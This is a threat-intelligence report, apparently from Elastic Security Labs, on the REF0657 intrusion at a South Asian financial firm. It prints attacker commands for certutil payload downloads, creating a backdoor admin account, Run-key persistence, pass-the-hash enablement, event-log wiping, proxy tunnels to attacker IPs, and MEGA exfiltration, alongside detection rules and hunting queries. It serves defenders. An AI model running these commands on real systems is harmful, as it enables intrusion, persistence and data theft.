In December of 2023, Elastic Security Labs detected a smash-and-grab style intrusion directed at a financial services organization in South Asia. Throughout the breach, a diverse set of open-source tools were employed within the victim's environment, some of which we encountered for the first time. The threat group engaged in different post-compromise activities: from discovery/enumeration to utilizing the victim's internal enterprise software against them and eventually leveraging different tunnelers and side-loading techniques to execute Cobalt Strike. In addition, the adversary used the file hosting service Mega to exfiltrate data from the network.
By disclosing the details of this intrusion set (REF0657) and the various tactics, techniques, and procedures (TTPs), we hope to assist fellow defenders and organizations in recognizing and monitoring this type of activity.
- REF0657 targeted financial services in South Asia
- This group leveraged a broad range of post-compromise behaviors, including backdoor access using Microsoft SQL Server, dumping credentials, wiping event logs, and exfiltrating data using MEGA CMD
- The activity included an assortment of network tunnelers and proxy tools as well as Cobalt Strike and ties to infrastructure using the C2 framework, Supershell
Our team identified the initial enumeration happening in a customer environment on December 17, 2023. While we didn't have visibility around the root cause of the infection, we continued to monitor the environment. Over the next several weeks, we discovered seven different hosts, mainly servers, exhibiting a large swath of activity, including:
- Downloading additional tools/components
- Renaming and staging tools in legitimate folder locations in the environment
- Dumping credentials from the registry and adding users to machines
- Modifying the environment to enable lateral movement and persistence
- Executing proxy tunnelers and shellcode to maintain access into the environment
- Compressing and exfiltrating data using cloud services provider Mega
- Wiping event logs on multiple machines
Execution Flow / Timeline
A significant portion of the activity observed by our team came through command-line execution abusing Microsoft SQL Server (
sqlservr.exe). While we couldn’t pinpoint the root cause, we have reason to believe the attacker gained access to the environment through this remotely accessible server and then started executing commands and running programs using the MSSQL’s stored procedure (
xp_cmdshell). This initial endpoint served as the beachhead of the attack where all activity seemed to originate from here.
The threat actor used several standard Windows utilities for initial discovery and enumeration. The following graphic shows the different commands spawned from the parent process (
Observed command-lines associated with discovery
Oftentimes, the attacker checked to verify their payloads were running, reviewed network connections on victim machines, and performed directory listings to check on their different files.
After initial access was gained, the actor tried several methods for downloading additional payloads and tooling. The adversary started to use
certutil.exe and then moved to
DownloadFile() method, and eventually back to
certutil.exe. These different tools interacted with IP addresses (
Observed command-lines associated with staging
Lateral Movement + Persistence
As the actors moved in the environment, they leveraged remote SMB and WMI to create a local administrator account named "helpdesk" on each machine. In some cases, they set up a randomly named Windows service (
qLVAMxSGzP) as a persistence mechanism. This service would execute a temporary batch file with commands to add a local user and insert this user into the local administrator group. After execution, the file would then be deleted.
%COMSPEC% /Q /c echo net user helpdesk P@ssw0rd /add && \
net localgroup administrators helpdesk /add \
^> \\127.0.0.1\C$\FOUGTZ 2^>^&1 > %TEMP%\VOruiL.bat & \
%COMSPEC% /Q /c %TEMP%\VOruiL.bat & %COMSPEC% /Q /c del %TEMP%\VOruiL.bat
The adversary moved to Cobalt Strike for C2 and further execution. This time, they used a legitimately signed version of Trend Micro’s Deep Security Monitor (
ds_monitor.exe). This was used to load Cobalt Strike by side-loading a malicious DLL (
msvcp140.dll). We observed the download of the DLL from a
certutil.exe execution, and then we confirmed this behavior via call stack telemetry.
"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \
The screenshot below shows that the actor placed the TrendMicro application inside a directory labeled McAfee in ProgramData. We can see the malicious DLL being loaded from the same directory by checking the call stack.
Malicious DLL side-loading of
Shortly after, Run Key persistence was added to execute (
ds_monitor.exe) on system startup.
reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v \
TrendMicro /t REG_SZ /d \
"C:\ProgramData\McAfee\TrendMicro\ds_monitor.exe" /f /reg:64
An analysis on
msvcp140.dll reveals that the threat actor tampered with the DllEntryPoint of the legit Windows DLL by substituting it with modified code sourced from a public repository - this is a custom Cobalt Strike memory evasion loader.
Decompiled Sleep Obfuscation loading Cobalt Strike
While the original code retrieved the Cobalt Strike beacon from memory, the altered version loads a beacon in base64 format from a file named
config.ini that connects to
One of the main methods observed for gathering credentials was dumping the Security Account Manager (SAM) registry hive on different servers.
Events showing SAM registry dump
The threat actor modified several different configurations and settings to help further increase their access to the environment. One of our first observations of this behavior was enabling RDP (set value to 0) through the registry at the following path (
HKLM\SYSTEM\ControlSet001\Control\Terminal Server\fDenyTSConnections). Then, they disabled the Windows Firewall rules using the command:
NetSh Advfirewall set allprofiles state off.
Afterward, they enabled Restricted Admin mode through a registry modification, this allowed the adversary to conduct pass-the-hash style attacks against Remote Desktop Protocol (RDP).
cmd.exe /Q /c REG ADD "HKLM\System\CurrentControlSet\Control\Lsa" \
/v DisableRestrictedAdmin /t REG_DWORD /d 00000000 \
/f 1> \\127.0.0.1\C$\Windows\Temp\RExePi 2>&1
In addition to these changes, the attacker also wiped the Windows event logs for System and Security notifications using the Windows Event Utility,
cmd.exe /Q /c wevtutil.exe cl System 1> \
cmd.exe /Q /c wevtutil.exe cl Security 1> \
After a day of initial access, the adversary generated several shellcode injection alerts using
AppLaunch.exe (a binary that manages and executes applications built with Microsoft's .NET Framework) and outputting the results to a file called
1.txt. The command line argument associated with this alert is as follows:
c:\programdata\AppLaunch.exe proxy -r 206.237.0[.]49:12355 >> 1.txt
After examining the injected code, we identified the shellcode as a Golang binary known as
iox, which can be compiled from the following publicly available repository. This tool is designed for port forwarding and proxying with additional features such as traffic encryption. Based on the observed command line, the attacker established a proxy connection to
206.237.0[.]49 on port
Intended or not, the proxy utility was launched by several different legitimate processes:
mctray.exe. In this case, the threat actor side-loaded a common malicious unsigned DLL (
mscoree.dll) located in the
Malicious DLL side-loading of mscoree.dll
The actor employed another proxy known as Rakshasa, downloaded directly from the tool's official GitHub page using the
certutil command. It was stored in
c:\users\public\downloads\ra.exe, and then executed with the following command:
C:\Windows\system32\cmd.exe /C C:\Users\Public\Downloads\ra.exe -d 149.104.23[.]176:80.
This command creates a proxy tunnel to the threat actor infrastructure, connecting to the IP address
184.108.40.206 on port
80. If that wasn’t enough, the actor started to send and retrieve data from the network through ICMP tunneling. For example, when the actor executed the tasklist command, the output was saved to
C:\programdata\re.txt, and exfiltrated through ICMP using PowerShell.
ICMP tunneling script using PowerShell
One of the more noteworthy parts of this intrusion was centered around the adversary downloading MEGA Cmd, a command-line utility that works with the Mega file hosting service. While still leveraging MSSQL, they downloaded this program, renaming it to
"C:\Windows\system32\cmd.exe" /c certutil -urlcache -split -f \
Shortly after, we observed this utility being executed with an argument to a configuration file (called
tmp) and a compressed file stored with a backup extension (
.bak) being used in conjunction with Mega.
C:\users\public\downloads\ms_edge.exe --config \
C:\users\public\downloads\tmp copy \
Throughout this investigation, the threat group used several servers to host their payloads or forward network traffic. The Elastic Security Labs team discovered two web servers with open directories hosting files publicly reachable on:
Open directory at 206.237.3[.]150
In addition, our team observed Supershell panel, a Chinese-based C2 platform running on
Supershell Panel on 206.237.0[.]49
We validated an earlier finding in the previous section when we found a configuration file (referred to as
tmp in the Exfiltration section) used for automation with the Mega platform containing credentials used by the adversary. As well, there was a variety of web shell files and scripts originating from the following public repositories:
Furthermore, within these directories, we identified a few interesting binaries:
One of the files (
cloud_init) is a Golang ELF binary packed with UPX. After inspection, it was determined that it was compiled from the NPS repository, another intranet proxy server compatible with most common protocols. The threat actor altered the code to encrypt the strings during compilation. The decryption process uses separate byte arrays where the bytes of one array are combined with the bytes of the other array, employing operations such as addition, XOR, or subtraction for the decryption.
NPS string obfuscation example
After review, this DLL matched the same functionality/code as the previously discussed file (
REF0657 through MITRE ATT&CK
Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks.
Tactics represent the why of a technique or sub-technique. The adversary’s tactical goal is the reason for performing an action. The tactics observed in REF0657 were:
Techniques represent how an adversary achieves a tactical goal by performing an action. Elastic Security Labs observed the following techniques within REF0657:
- Command and Scripting Interpreter: Windows Command Shell
- System Binary Proxy Execution
- Deobfuscate/Decode Files or Information
- Windows Management Instrumentation
- Ingress Tool Transfer
- Hijack Execution Flow: DLL Side-Loading
In summary, this intrusion highlighted some new tooling while re-emphasizing that not all intrusions are dictated by novel malware and techniques. These types of threats demonstrate the real-world challenges most organizations are faced with daily.
The threat group moved very quickly in this environment, where within almost 24 hours, meaningful data to the attacker was extracted from the network. Sharing some of these details can help defenders plug possible holes or gaps in coverage from some of these techniques.
The Diamond Model
Elastic Security Labs utilizes the Diamond Model to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.
REF0657 - Diamond Model
The following detection rules and behavior prevention events were observed throughout the analysis of this intrusion set:
- Direct Outbound SMB Connection
- Execution via MSSQL xp_cmdshell Stored Procedure
- Execution via Renamed Signed Binary Proxy
- Potential Remote Credential Access via Registry
- Process Execution from an Unusual Directory
- Suspicious CertUtil Commands
- WMI Incoming Lateral Movement
- Ingress Tool Transfer via INET Cache
- Potential Masquerading as Windows Error Manager
- Potential Lateral Movement via SMBExec
- Suspicious Cmd Execution via WMI
- RunDLL32 with Unusual Arguments
- Suspicious PowerShell Execution
Hunting queries in Elastic
Hunting queries could return high signals or false positives. These queries are used to identify potentially suspicious behavior, but an investigation is required to validate the findings.
Using the Timeline section of the Security Solution in Kibana under the “Correlation” tab, you can use the below ES|QL queries to hunt for similar behaviors:
WHERE process.parent.name == "sqlservr.exe"
AND process.name == "cmd.exe"
WHERE process.name == "ms_edge.exe"
AND process.code_signature.exists == false
AND NOT process.executable
RLIKE ".*Program Files.*"
Elastic Security has created the following YARA rules to identify this activity:
All observables are also available for download in both ECS and STIX format in a combined zip bundle.
The following observables were discussed in this research.
|File hosting infrastructure
|File hosting and supershell infrastructure
|Cobalt Strike infrastructure
|Cobalt Strike infrastructure
About Elastic Security Labs
Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.